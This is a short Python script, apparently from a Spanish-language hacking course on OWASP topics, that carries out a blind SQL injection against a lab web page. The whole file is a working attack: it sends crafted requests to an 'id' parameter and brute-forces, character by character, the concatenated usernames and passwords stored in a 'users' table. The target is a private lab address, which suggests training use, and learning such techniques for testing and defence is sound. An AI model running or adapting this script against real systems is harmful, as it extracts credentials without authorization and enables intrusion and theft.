infosec/Introduccion-hacking-hack4u/tema_6_owasp/01_sqli/sqli.py

62 lines
1.2 KiB
Python

#!/usr/bin/env python
"""
Script de Inyección SQL
"""
import requests
import signal
import sys
import time
import string
from pwn import *
def signal_handler(signal, frame):
"""
Salir con Ctrl+C
"""
print('Saliendo con Ctrl+C!')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
# Variables globales
main_url = "http://192.168.1.121/searchUsers2.php"
characters = string.printable
def makeSQLI():
p1 = log.progress("Fuerza bruta")
p1.status("Fuerza bruta en proceso")
time.sleep(2)
p2 = log.progress(f"Datos extraídos:\n\t")
extracted_info = ""
for position in range(1, 67):
for character in range(33, 126):
sqli_url = main_url + \
"?id=9 or (select(select ascii(substring((select group_concat(username,0x3a,password) from users),%d,1)) from users where id = 1)=%d)" % (
position, character)
p1.status(
f"\n[i] Probando posición {position} el carácter: {chr(character)}")
r = requests.get(sqli_url)
if r.status_code == 200:
extracted_info += chr(character)
p2.status(extracted_info)
break
if __name__ == "__main__":
makeSQLI()